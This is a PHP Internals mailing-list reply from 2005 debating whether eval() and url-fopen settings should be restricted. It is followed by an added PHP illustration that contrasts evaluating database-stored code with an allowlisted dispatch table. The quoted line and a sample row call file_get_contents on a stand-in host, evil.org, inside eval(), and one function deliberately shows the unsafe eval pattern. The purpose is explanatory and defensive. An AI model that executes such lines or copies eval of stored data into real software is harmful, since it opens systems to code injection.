At 04:39 PM 7/28/2005, George Schlossnagle wrote:
> sure: eval('file_get_contents("http://evil.org");');
> You could say this is just bad policy on the part of code authors,
> but that's what these options were geared to handle in the first
> place, right?
I don't know, I think that if you aim that well you should be allowed to
shoot yourself in the foot :) If we go that far, then running code from
the database through eval() should also not be allowed, because it may have
been indirectly written to by remote users. Which boils down to maybe
allowing people to disable eval() (yet another ini entry, yay! :)
Let's wait and hear some more opinions.
Zeev
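Zeev's database case, as an added illustration that is not from the thread or from PHP itself: the first function reproduces the risky pattern (stored text handed straight to eval(), which no url-related ini option can catch), the second replaces it with an allowlisted dispatch table so stored data can only select behaviour, never define it. The function names, the ACTIONS table and the sample rows are assumptions.

```php
<?php
// Added example (not from the php-internals thread). Constructed sample rows
// standing in for a table that remote users can indirectly write to.
$rows = [
    ['id' => 1, 'action' => 'return strtoupper($input);'],
    ['id' => 2, 'action' => 'return file_get_contents("http://evil.org");'],
];

// Risky pattern from the discussion: stored text is executed as PHP.
// allow_url_fopen / allow_url_include cannot help here because the code
// itself never came from a URL; it came from the database.
function run_stored_code_unsafe(string $code, string $input): string
{
    // eval() runs in this scope, so the stored snippet can read $input
    // and do anything else the PHP process is allowed to do.
    return (string) eval($code);
}

// Hardened replacement: storage holds only a *name*, and the name is
// resolved against a fixed allowlist compiled into the application.
const ACTIONS = [
    'upper' => 'strtoupper',
    'trim'  => 'trim',
];

function run_stored_action(string $name, string $input): string
{
    if (!array_key_exists($name, ACTIONS)) {
        // Unknown names are rejected instead of executed.
        throw new InvalidArgumentException("unknown action: $name");
    }
    return (ACTIONS[$name])($input);
}

// Usage: a row now stores 'upper' instead of PHP source, so whoever can
// write that column can at most choose between the two existing actions.
echo run_stored_action('upper', 'hello'), "\n";
try {
    run_stored_action('return file_get_contents("http://evil.org");', 'hello');
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```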
--
PHP Internals - PHP Runtime Development Mailing List
To unsubscribe, visit: http://www.php.net/unsub.php